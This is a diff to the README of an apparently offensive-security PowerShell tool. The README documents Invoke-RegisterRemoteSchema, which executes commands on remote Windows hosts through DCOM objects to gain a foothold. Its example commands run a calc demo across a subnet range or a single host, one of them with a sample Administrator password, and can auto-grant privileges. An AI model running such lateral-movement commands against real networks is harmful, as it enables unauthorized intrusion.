ScorpionesLabs/DVS/Readme.md

 #### Invoke-RegisterRemoteSchema

-Invoke-RegisterRemoteSchema function executes commands via InternetExplorer.Application's object using the logged-on user or provided credentials.
+Invoke-RegisterRemoteSchema function allows to executes commands via the following DCOM objects using the logged-on user or provided credentials:
 * ShellBrowserWindow
 * ShellWindows
 * Internet Explorer
 * ielowutil.exe

-**Note:** This object doesn't need any access to local machine hive, it will proceed with the foothold with any user that can access the remote machine!
+**Note:** These DCOM-objects doesn't need any access to local machine hive. they can foothold with any user that can access the remote machine!

 * Examples:
   1. Executes `cmd /c calc` command on `10.211.55.1/24` range using the current logged-on session, and grant privileges if is needed

             PS> Invoke-RegisterRemoteSchema -HostList "10.211.55.1/24" -Command "cmd /c calc" -AutoGrant -Verbose

-  2. Executes `cmd /c calc` command on 10.211.55.4 remote machine using provided credentials
+  2. Executes `cmd /c calc` command on `10.211.55.4` remote machine using provided credentials

             PS> Invoke-RegisterRemoteSchema -HostList "10.211.55.4" -Command "cmd /c calc" -Username "Administrator" -Password "Aa123456!" -Verbose